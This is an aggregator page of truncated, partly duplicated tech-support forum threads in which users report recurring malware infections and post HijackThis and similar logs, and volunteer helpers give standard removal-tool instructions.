Well, I tried at first to clean up with Spybot and Spyware Doctor (who had not by the way intercepted the hostile item). But the machine still had a strange behaviour so I downloaded some Linux based Rescue CD .iso files (Kaspersky, BitDefender, WebDoctor), burned the CDs and went on scanning without Windows. Those found a wealth of infections by Trojans as well as by the Virut thing, so I kept cleaning and cleaning (disinfecting and/or deleting that is) until nothing more was found.
I then restarted Windows, uninstalled Flashget and installed Avast antivirus. Unfortunately when using my browser I started to get redirected to a "stolnik.net" whatever search I did. Plus Avast began to show infections spreading in the system by a "W32.Vitro" virus. So I tried again with the rescue CDs - Kaspersky found a couple issues but nothing else - and Avast still claiming I have the W32.Vitro everywhere.
At this point I used the VirutCF removal tool by Norton, but to no avail - there is no Virut infection in the machine.
I was beginning to get nervous so I downloaded the Combofix tool, disabled all and every anti-virus and -spyware - as requested - and tried to start Combofix: nothing happens... Read more

Answer:They keep coming back

If you truly have Virut the only real alternative is to do a complete wipe and reinstall. See boopme's post here: http://www.bleepingcomputer.com/forums/ind...t&p=1260380 That will help you determine if you have Virut, and if you do, what you need to do.

13 more replies
Relevance 49.2%

I have a PC I believe is infected.
I have run Combofix; it appears to find something and reboot, but I am unable to tell by the log what it found.
I think it is still infected because if I run CF again, it says it needs to reboot to continue.
 ComboFix.txt   29.88KB
  5 downloads
 ComboFix2.txt   30.15KB
  3 downloads
 ComboFix3.txt   26.11KB
  2 downloads
 ComboFix4.txt   29.75KB
  3 downloads

Answer:it keeps coming back

Hello cgtrott, I will be handling your log to help you get cleaned up. I apologize for the delay but the forum is very busy and as you can see the logs we ask for are very extensive and take a lot of time to investigate.

Please subscribe to this topic. Click on the Watch Topic button, select Immediate Notification and click on proceed.

Make sure Word Wrap in notepad is turned off. When copying and pasting logs paste them directly in the reply box, only attach logs if asked to. Do not wrap logs in codebox or code tags. It makes it very difficult to read and analyze them. Please paste them directly into the reply box.

Do not make any changes to your system until we are through. Fixes are based upon information that is current from your system so any changes can affect our strategy. Please refrain from running any tools we may use without specific instructions.

If your operating system is Windows Vista or Windows 7 it may be necessary to right click then choose Run as Administrator any programs we use.

Before we begin please check and follow the instructions on How to Show Hidden Files and Folders in Windows Vista and Windows XP and How to show hidden files in Windows 7.

Because the e-mail notification system is not completely reliable, please check your topic once a day for responses.

Please read carefully all directions and instructions. If you are instructed to save a tool to the desktop please save it to the desktop. If you have since resolved the original problem you were ha...

2 more replies

I've run Ad-awareSE, Trend Micro's housecall, and McAfee. I've also run Ad-aware while in safemode yet I still keep getting these popups and McAfee keeps telling me that "The file C:\\WINDOWS\system32\winupdt.exe was infected by the Downloader-LG trojan and has been deleted to complete the cleaning process." It says it repeatedly then stops then a few hours later it'll come back. Here is my Hijack This log:
Logfile of HijackThis v1.99.1
Scan saved at 6:07:30 PM, on 3/15/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wkogyo.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:...

Answer:They just keep coming back...

16 more replies

I have a problem with pop-up ads that keep on appearing randomly on my computer. I tried using adaware which picked up a lot of them, but they keep coming back later.

Hijack this log (Created with Hijack-this Analyzer)

====================================================================
Log was analyzed using KRC HijackThis Analyzer - Updated on 4/1/05
Get updates at http://www.greyknight17.com/download.htm#programs

***Security Programs Detected***

C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Fil...

Answer:Pop-Ups that keep coming back

Hi and welcome to TSF.

I am currently reviewing your log. Please note that this is under the supervision of an expert analyst, and I will be back with a fix for your problem a.s.a.p

Please be patient with me during this time.

4 more replies

Can't seem to get rid of the trusted zones, option is disabled in internet tools. I've run spybot, adware and avast but they still show.

Logfile of HijackThis v1.99.0
Scan saved at 10:18:03 AM, on 2/4/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\Program Files\Lexmark X6100 Series\lxbfbmgr.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\Program Files\Lexmark X6100 Series\lxbfbmon.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\America Online 9.0\aoltray.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Microsoft Office\OFFICE11\ONENOTEM.EXE
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Microsoft SQL Server\MSSQL$MICROSOFTBCM\Binn\sqlservr.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent....

Answer:they keep coming back!

Please print out or copy this page to Notepad. Make sure to work through the fixes in the exact order it is mentioned below. If there's anything that you don't understand, ask your question(s) before proceeding with the fixes. You should not have any open browsers when you are following the procedures below.

Go to My Computer->Tools/View->Folder Options->View tab and make sure that 'Show hidden files and folders' (or 'Show all files') is enabled. Also make sure that 'Display the contents of System Folders' is checked. Windows XP's search feature is a little different. When you click on 'All files and folders' on the left pane, click on the 'More advanced options' at the bottom. Make sure that Search system folders, Search hidden files and folders, and Search subfolders are checked.

For the options that you checked/enabled earlier, you may uncheck them after your log is clean. If we ask you to fix a program that you use or want to keep, please post back saying that (we don't know every program that exists, so we may tell you to delete a program that we think is bad to keep).

Turn off system restore by right clicking on My Computer and go to Properties->System Restore and check the box for Turn off System Restore. Click Apply and then OK. Restart your computer. After we are finished with your log file and verified that it's clean, you may turn it back on and create a new restore point.

Right click on this link http://www.greyknight17.com/spy/De...

3 more replies

Hey everyone, this is the first time I have posted anything but I am having some serious problems. I let my brother borrow my laptop and when I got it back it was infected bad.
I have pc-cillin, Malwarebytes, and SuperAnti-Spyware.
SuperAnti-Spyware seems to clean everything after I scan and reboot but there are two things that keep coming back on the next re-boot.
1. Pc-cillin keeps giving me a warning telling me to close the browser when it's not open with the web address of 110/rjsa/select.php?a=6707a0a cd82d9318fa98c6ee396eed8e61fcf4200553e0c95d8b1d81bbda3c1b&b=1001&c=1
2. There is a sys32 file that gets deleted and always comes back on reboot, it's MoIXWA40.dll
Pc-Cillin tells me this is a trojan.bho and says it will delete on reboot.
Please help me, this is so frustrating, it slows everything down sooo slow.
 

Answer:Pop-Ups keep coming back

Hi, Welcome to TSG!!
Click here to download HJTInstall.exe

Save HJTInstall.exe to your desktop.
Doubleclick on the HJTInstall.exe icon on your desktop.
By default it will install to C:\Program Files\Trend Micro\HijackThis .
Click on Install.
It will create a HijackThis icon on the desktop.
Once installed, it will launch Hijackthis.
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
Come back here to this thread and Paste the log in your next reply.
DO NOT have Hijackthis fix anything yet. Most of what it finds will be harmless or even required.

 

1 more replies
Question: keeps coming back

I keep running scans and it cleans the computer sometimes. I will encounter xp antispyware 2009 and 2008 telling me that my computer is infected. It posts a permanent box on my desktop saying infected and keeps popping up at bottom right by time clock saying infected. I will run anti malwarebytes and it will clean it only if I do quick scan. But then I will run full scan and it freezes so I know it is still infected. And sure enough a few days later it is all back. Please help. I also run cc cleaner and norton but norton freezes too. I have also tried in safemode but still freezes. Thanks. Any and all help is greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:56:21 PM, on 10/8/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Intel\Inte...

Answer:keeps coming back

bump
 

2 more replies
Question: Back coming off?

My Lumia 640 is quite new and the back plastic panel writing logo is coming off. The Microsoft logo has come off and some letters are coming away.
Is this normal?

More replies

Here is my dilemma:

I've run Kazaabegone, CWShredder, Spybot and Adware with new updates and reboots in between. I've run Hijack This and removed what I knew to be suspicious files in safe mode. But one:

O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net
O10 - Hijacked Internet access by New.Net

keeps reappearing on the HJT log after rebooting. I know I'm missing something; just don't know what.

Here is the entire log:

Logfile of HijackThis v1.97.7
Scan saved at 8:04:28 PM, on 2/1/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MPFSERVICE.exe
C:\WINDOWS\wanmpsvc.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfAgent.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\MUSICMATCH\MUSICMATCH Jukebox\mm_tray.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\Program Files\Common Files\Dell\EUSW\Support.exe
C:\Program Files\EarthLink 5.0\Con...

Answer:New.net keeps coming back

6 more replies

Hi, I hope somebody can help me. I'm running Windows 95 B with Internet Explorer 5.5 and I keep getting "Error loading C:\WINDOWS\TEMP\se.dll". When I run IE, avg detects trojan horse startpage 16.bd and my start page is now advertising called "about: blank". I've deleted se.dll but it just keeps coming back. I'd appreciate any suggestions. thanx!
 

Answer:se.dll keeps coming back!

It sounds like you got hijacked. This should have been posted on the spyware specific board. Follow the instructions on this link below.

http://forums.majorgeeks.com/showthread.php?t=35407 <--
Sticky: READ ME FIRST BEFORE ASKING FOR SUPPORT: Basic Spyware, Trojan And Virus Removal

g/l - sos
 

1 more replies

Oh God help me... these anti-spyware pop ups keep popping up and I always run a check on ad-aware 6 and Spybot once I see it. But once I connect to the net and open a site, it all comes back again and I have to scan it all over again.... help please, this is real miserable...

Thank you.

Answer:It just keeps coming back...

Try manually removing, on www.doxdesk.com there are listings for spyware/parasites.

You could also go to run > msconfig and deselect any programs starting up that you don't recognise.

Also try going to http://www.symantec.com/homecomputing/
At the bottom is a link to a free online virus check, you may have one that persistently downloads spyware.

And finally ensure you have a firewall and if you have one make sure it's up to date. www.download.com has a free copy of zonealarm, that's a good one.

6 more replies

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friend's system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disabled Spyware Doctor from auto load with windows as it seemed to be interfering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX...

Answer:E2G keeps coming back

16 more replies

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friend's system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disabled Spyware Doctor from auto load with windows as it seemed to be interfering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX...

Answer:E2G keeps coming back

Thread closed, please do not post duplicates!
Continue here: http://forums.techguy.org/security/460316-e2g-keeps-coming-back.html
 

1 more replies
Question: Keeps Coming Back

Can someone please help me with this problem? All my AV programs detect a virus running in my system, but whenever I have it removed, it keeps coming back. How can I stop this???


HJT Log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:22:13 AM, on 8/25/2008
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Nexon\Mabinogi\npkcmsvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\csrcs.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Spybot - Search & Destroy\SpybotSD.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper....

Answer:Keeps Coming Back

Hello and Welcome. Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

---------------------------------------------------------------------------------------------

If you still require assistance with this issue, please do this:
Download RSIT by random/random and save it to your desktop.
Double click RSIT.exe to start the tool and click Continue at the disclaimer.
When the scan completes it will open a log named log.txt maximized, and a log named info.txt minimized.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of log.txt here.
Please attach info.txt to your post.
To attach a file to a new post, simply click the [Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box: C:\rsit\info.txt

Click Upload.

---------------------------------------------------------------------------------------------

2 more replies

I think I may have finally scrubbed enough to keep the dll (IeBHOs.dll) from re-appearing, but the E2G folder keeps recreating itself. Any suggestions?

It's a friend's system and had Norton on it. I installed NOD32 and PC Tools Spyware Doctor. Then read a few threads and ran HJT a few times and made some deletions that "may" have helped. I know that I managed to get rid of the TrojanDownLoader-AC2 but this E2G is stubborn.

Also ran SpySweeper many times in safe mode and in non-safe mode. Disabled Spyware Doctor from auto load with windows as it seemed to be interfering with the Spy Sweeper scan.

Here's the latest HJT log:

Thanks in advance for any suggestions!

Charlie

Logfile of HijackThis v1.99.1
Scan saved at 6:51:15 PM, on 4/18/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EX...

Answer:E2G keeps coming back

Three threads are not needed for the same problem.
 

2 more replies

Windows Security 7 keeps coming back after doing all the steps
 

Answer:it keeps coming back

Please attach the logs from both SUPERantispyware and MalwareBytes. Also run the below and attach the log.

I want you to run TDSSKiller so refer to the below for how to do so.

TDSSkiller - How to run
 

11 more replies

I used Vundofix, ad-aware, spybot, xoft, avg, House call, Microtrend. Don't know what to do next? Here is my info:

Logfile of HijackThis v1.99.1
Scan saved at 1:48:37 PM, on 3/22/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\NavNT\defwatch.exe
C:\Program Files\NavNT\rtvscan.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\NavNT\vptray.exe
C:\Program Files\BearShare\BearShare.exe
C:\Program Files\ArcSoft\PhotoImpression 5\PI Monitor.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.Begin2Search.com/search.html
O4 - HKLM\..\Run: [vptray] C:\Program Files\NavNT\...

Answer:Pop Up's Keep Coming Back

Hello Mhenry, Welcome to BleepingComputer!
My name is Nick and I will be checking over your log.
Let's get started.
You will want to print or save these instructions.

Please download Look2Me-Destroyer.exe to your desktop.
Close all windows before continuing.
Double-click Look2Me-Destroyer.exe to run it.
Put a check next to Run this program as a task.
You will receive a message saying Look2Me-Destroyer will close and re-open in approximately 1 minute. Click OK.
When Look2Me-Destroyer re-opens, click the Scan for L2M button, your desktop icons will disappear, this is normal.
Once it's done scanning, click the Remove L2M button.
You will receive a Done Scanning message, click OK.
When completed, you will receive this message: Done removing infected files! Look2Me-Destroyer will now shutdown your computer, click OK.
Your computer will then shutdown.
Turn your computer back on.
Please post the contents of Look2Me-Destroyer.txt (it can be found wherever you saved Look2Me-Destroyer.exe) and a new HiJackThis log.
If Look2Me-Destroyer does not reopen automatically, reboot and try again.

I highly suggest you get rid of BearShare. It is a P2P program which is usually the cause for malware.
Read here for more information on clean and infected File Sharing Programs.

Click Start > Control Panel > Add/Remove Programs and remove:
BearShare
Please note any other programs that you don't recognize in that list in your next response.
Reboot your computer once more.

Please go HERE to run Panda's ActiveScan
On...

1 more replies

Hot bar I am told is a parasite. That is, it's a freebie that seems friendly but in reality is sucking all your secrets. So last night I deleted all trace of it from the system by norton and by Regedit. Tonight it's back...... What sort of mallet does this need?

Answer:hot bar keeps a coming back

Please post a HJT log, click here. You may need to post it in two halves because of the 800 word limit. Please double space it by adding a blank line after each line so that it is legible with the site's formatting.

4 more replies

Hi everyone,

I had this fake FBI Virus on a laptop a couple of days ago, it would not let Windows boot, not even in safe mode. I got it cleaned with a kaspersky boot disc, and also scanned it with avg, malwarebytes, avast. Sent it back to the customer, same night he called me saying avast kept picking up something but was not able to remove it! So I picked it up again the next day, scanned with avg & malwarebytes, it seemed to be cleaned up again, nothing was picking up any viruses. But guess what? This morning I have a text from the customer, saying he was locked up out of screen and he was able to get into it, but now avg is picking up something again!!! I asked him if he uses a usb drive or external or anything but he said he did not use any of those! PLEASE HELP WITH REMOVAL OF THIS!!!!

Answer:It keeps coming back!!!!

Hello sapikest,
my name is Marius and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Before we start, please note:

Please be advised that this free service is typically for home users. We'll help you out this time, but in the future if you are unable to clean a machine via standard methods, then either backup the client's data and rein...

2 more replies

Every time I run Webroot's spysweeper it finds a cws threat. I don't understand why it keeps popping up, even after I tell spysweeper to remove it. Someone want to help me....

Logfile of HijackThis v1.99.1
Scan saved at 7:44:30 PM, on 10/25/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\System32\nvsvc32.exe
D:\programfiles\Spy Sweeper\Spy Sweeper\WRSSSDK.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Logitech\iTouch\iTouch.exe
C:\Program Files\Eset\nod32kui.exe
D:\programfiles\Spy Sweeper\Spy Sweeper\SpySweeper.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
D:\programfiles\MicrosoftAntivirus\gcasServ.exe
C:\Program Files\QuickTime\qttask.exe
D:\programfiles\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
D:\programfiles\MicrosoftAntivirus\gcasDtServ.exe
C:\Program Files\LIUtilities\WinTasks\wintasks.exe
D:\programfiles\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www....

Answer:CWS keeps coming back

8 more replies

This is my second attempt at help. I failed my first time and after reading the preparation guide here I am. I tried fixing it myself and loading MBAM and it says I have an infected registry value (Trojan.Agent). When I run the MBAM it says my computer must reboot to fix. It does, but then I have the same infection. I am confused, frustrated, and not really sure now what I am doing. Thankfully there are those here that can help...I am humbled.

Here is my DDS.txt
DDS (Ver_09-03-16.01) - NTFSx86
Run by Owner at 16:10:46.34 on Tue 03/31/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.511.186 [GMT -4:00]

AV: Avira AntiVir PersonalEdition *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\WINNT\system32\svchost -k DcomLaunch
svchost.exe
C:\WINNT\System32\svchost.exe -k netsvcs
C:\WINNT\system32\svchost.exe -k WudfServiceGroup
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\WINNT\system32\ezSP_Px.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\WINNT ...

Answer:Not sure what I have...but it keeps coming back

Welcome to the BleepingComputer Forums.

Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again.

Double click on RSIT.exe to run RSIT.
Click Continue at the disclaimer screen.
Please post the contents of log.txt.

Thank you for your patience.

Please see Preparation Guide for use before posting about your potential Malware problem.

